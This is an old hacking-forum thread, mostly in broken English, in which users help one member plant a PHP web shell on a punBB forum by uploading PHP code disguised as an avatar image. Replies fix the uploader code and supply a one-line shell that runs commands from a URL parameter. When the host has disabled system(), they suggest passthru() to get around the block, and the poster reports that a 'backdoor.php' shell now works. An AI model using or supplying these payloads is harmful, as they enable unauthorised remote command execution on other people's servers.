Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

09.10.2005, 19:15
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме: 63022
Репутация:
26
|
|
About punbb video... :)
io !!!
http://video.antichat.net/videos/ShAnKaR/xak.rar
I have an error with the picture..
Parse error: parse error, unexpected ')' in /space_3/mrtom/forum/img/avatars/q.php on line 1
My picture :
<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>
Please, somebody to give me an original picture ?
Thank'S
|
|
|

09.10.2005, 23:08
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме: 1941233
Репутация:
2726
|
|
<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>
Right code:
<?
$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? include($fuck); ?>" );
fclose( $f );
?>
or
$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? system($fuck); ?>" );
fclose( $f );
?>
- then $fuck parameter specify SHELL COMMAND, not file to include
|
|
|

10.10.2005, 02:48
|
|
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме: 1212666
Репутация:
662
|
|
<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/q.php","a+");
fwrite($fopen,$shell);
?>
Make so if you have access in that directory then all will work..
__________________
|
|
|

10.10.2005, 03:01
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме: 1941233
Репутация:
2726
|
|
and fclose($fopen);
or fflush($fopen);
|
|
|

10.10.2005, 05:16
|
|
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме: 1212666
Репутация:
662
|
|
It is possible to not close all and so will work %)
__________________
|
|
|

10.10.2005, 11:38
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме: 63022
Репутация:
26
|
|
Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1
with :
<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/c.php","a+");
fwrite($fopen,$shell);
?>
not other means?
|
|
|

10.10.2005, 13:02
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме: 1941233
Репутация:
2726
|
|
Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1
system() function created for execute commands, system( "ls -ailrt" ); for example.
this function was disabled for security reasons by admin. try to change system() to passthru().
if there has not works, use only file includin'... you can see it on ShAnKaR's video...
че сказал сам нипонил
|
|
|

10.10.2005, 15:57
|
|
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме: 63022
Репутация:
26
|
|
no good..
BUT !! !! !!!!
I put the code of "backdoor.php" (shellZ) in the picture and it's Good !
Thx KeZ and others 
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|